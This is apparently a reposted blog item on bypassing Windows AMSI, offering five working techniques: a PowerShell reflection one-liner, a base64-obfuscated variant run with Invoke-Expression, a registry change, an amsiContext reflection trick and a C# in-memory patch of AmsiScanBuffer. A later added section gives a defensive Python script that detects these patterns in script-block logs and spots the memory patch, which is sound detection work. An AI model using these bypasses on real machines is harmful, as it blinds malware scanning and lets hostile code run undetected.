Bypassing AMSI in 2025

https://lnkd.in/dicZ677j

You Should Know:

Bypassing AMSI (Antimalware Scan Interface) is a critical technique in penetration testing and red teaming. Below are some practical commands and code snippets to help you understand and practice AMSI bypass techniques.

1. Basic AMSI Bypass with PowerShell:

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

2. Using Base64 Encoding to Obfuscate AMSI Bypass:

$encoded = "WwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkA"
$decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded))
Invoke-Expression $decoded

3. AMSI Bypass via Registry:

Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\AMSI" -Name "Enable" -Value 0

4. Using .NET Reflection to Disable AMSI:

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext','NonPublic,Static').SetValue($null, $null)

5. AMSI Bypass via Memory Patching:

using System;
using System.Runtime.InteropServices;

class Program
{
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr LoadLibrary(string lpFileName);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

    static void Main(string[] args)
    {
        IntPtr hModule = LoadLibrary("amsi.dll");
        IntPtr pAddress = GetProcAddress(hModule, "AmsiScanBuffer");
        uint oldProtect;
        VirtualProtect(pAddress, (UIntPtr)5, 0x40, out oldProtect);
        Marshal.WriteByte(pAddress, 0xB8);
        Marshal.WriteByte(pAddress + 1, 0x57);
        Marshal.WriteByte(pAddress + 2, 0x00);
        Marshal.WriteByte(pAddress + 3, 0x07);
        Marshal.WriteByte(pAddress + 4, 0x80);
        VirtualProtect(pAddress, (UIntPtr)5, oldProtect, out oldProtect);
    }
}
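The snippets above are useful to a defender mainly as indicators. What follows is an added example written for this page (it is not code from the original post or its author): a small Python script that shows the two checks a blue team would run against techniques 1 through 5. The first check scans PowerShell script-block log text (the content recorded as Event ID 4104) for the strings those snippets rely on and decodes long base64 runs first, so the UTF-16LE encoding from snippet 2 does not hide the snippet 1 one-liner. The second check compares the leading bytes of AmsiScanBuffer as mapped in a process with the bytes from the on-disk copy of amsi.dll, which is how the in-memory patch from snippet 5 is spotted; the patch bytes B8 57 00 07 80 are `mov eax, 0x80070057` (E_INVALIDARG). All function names are hypothetical, the log entries are constructed, and `FAKE_ON_DISK_PROLOGUE` is a placeholder, not the real prologue of amsi.dll.

```python
"""Defender-side checks for the AMSI tampering patterns in snippets 1-5.

Added example, not from the original post. Log lines and byte strings below
are constructed; nothing here reads a real event log or a real process.
"""
import base64
import re

# Indicators taken from the snippets on the page, matched case-insensitively.
AMSI_INDICATORS = [
    r"amsiutils",          # System.Management.Automation.AmsiUtils (snippets 1, 2, 4)
    r"amsiinitfailed",     # field forced to $true (snippets 1, 2)
    r"amsicontext",        # field nulled (snippet 4)
    r"amsiscanbuffer",     # export patched in memory (snippet 5)
    r"\\microsoft\\amsi",  # registry path (snippet 3)
]
_INDICATOR_RE = re.compile("|".join(AMSI_INDICATORS), re.IGNORECASE)

# Any run of 40+ base64 characters is worth decoding. -EncodedCommand and the
# FromBase64String pattern in snippet 2 carry UTF-16LE text, so that decoding
# is tried alongside UTF-8.
_B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_base64_candidates(text):
    """Return every plausible plaintext hidden in base64 runs inside text."""
    decoded = []
    for match in _B64_RE.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        for encoding in ("utf-16-le", "utf-8"):
            try:
                decoded.append(raw.decode(encoding))
            except UnicodeDecodeError:
                pass
    return decoded


def scan_script_block(script_text):
    """Sorted list of AMSI indicators found in one script block, including
    inside base64 blobs. An empty list means nothing matched."""
    hits = set()
    for candidate in [script_text] + decode_base64_candidates(script_text):
        for match in _INDICATOR_RE.finditer(candidate):
            hits.add(match.group(0).lower())
    return sorted(hits)


def flag_log(entries):
    """entries: list of (event_id, script_text). Only 4104 script-block
    events are inspected. Returns {index: indicators} for matching entries."""
    flagged = {}
    for index, (event_id, script_text) in enumerate(entries):
        if event_id != 4104:
            continue
        hits = scan_script_block(script_text)
        if hits:
            flagged[index] = hits
    return flagged


# Bytes snippet 5 writes: B8 57 00 07 80 == "mov eax, 0x80070057", i.e. make
# the function return E_INVALIDARG (little-endian immediate).
E_INVALIDARG_PATCH = bytes([0xB8, 0x57, 0x00, 0x07, 0x80])


def prologue_patched(in_memory_prologue, on_disk_prologue):
    """Compare AmsiScanBuffer's leading bytes from a live process against the
    same bytes read from amsi.dll on disk. Returns a short verdict string."""
    if in_memory_prologue.startswith(E_INVALIDARG_PATCH):
        return "patched: mov eax, E_INVALIDARG"
    if in_memory_prologue[:len(on_disk_prologue)] != on_disk_prologue:
        return "modified: differs from on-disk image"
    return "intact"


# --- constructed sample data (not real logs, not real amsi.dll bytes) -------
BYPASS_ONE_LINER = ("[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                    ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)")
ENCODED = base64.b64encode(BYPASS_ONE_LINER.encode("utf-16-le")).decode("ascii")

SAMPLE_LOG = [
    (4104, "Get-Process | Where-Object { $_.CPU -gt 10 }"),
    (4104, BYPASS_ONE_LINER),
    (4104, '$d = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("'
           + ENCODED + '")); Invoke-Expression $d'),
    (4104, 'Set-ItemProperty -Path "HKLM:\\SOFTWARE\\Microsoft\\AMSI" -Name "Enable" -Value 0'),
    (4103, BYPASS_ONE_LINER),  # different event id: ignored by flag_log
]

# Placeholder standing in for the real on-disk prologue bytes of AmsiScanBuffer.
FAKE_ON_DISK_PROLOGUE = bytes([0x48, 0x89, 0x5C, 0x24, 0x08])

if __name__ == "__main__":
    for index, hits in flag_log(SAMPLE_LOG).items():
        print(f"entry {index}: {hits}")
    print(prologue_patched(E_INVALIDARG_PATCH + b"\xC3", FAKE_ON_DISK_PROLOGUE))
    print(prologue_patched(FAKE_ON_DISK_PROLOGUE, FAKE_ON_DISK_PROLOGUE))
```

String matching is a baseline: it catches the snippets exactly as posted and their base64 form, but any further obfuscation of the identifiers slips past it, which is why the integrity comparison of the mapped export against the on-disk image is the more durable of the two signals. In production the same comparison is done against the actual bytes read from the process and from amsi.dll rather than the placeholder used here.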

What Undercode Say:

Bypassing AMSI is a crucial skill for red teamers and penetration testers. The techniques mentioned above provide a starting point for understanding how AMSI works and how it can be bypassed. However, always ensure you have proper authorization before testing these techniques in any environment. For further reading and advanced techniques, refer to the original article and other cybersecurity resources.

Reported By: Omar Aljabr – Hackers Feeds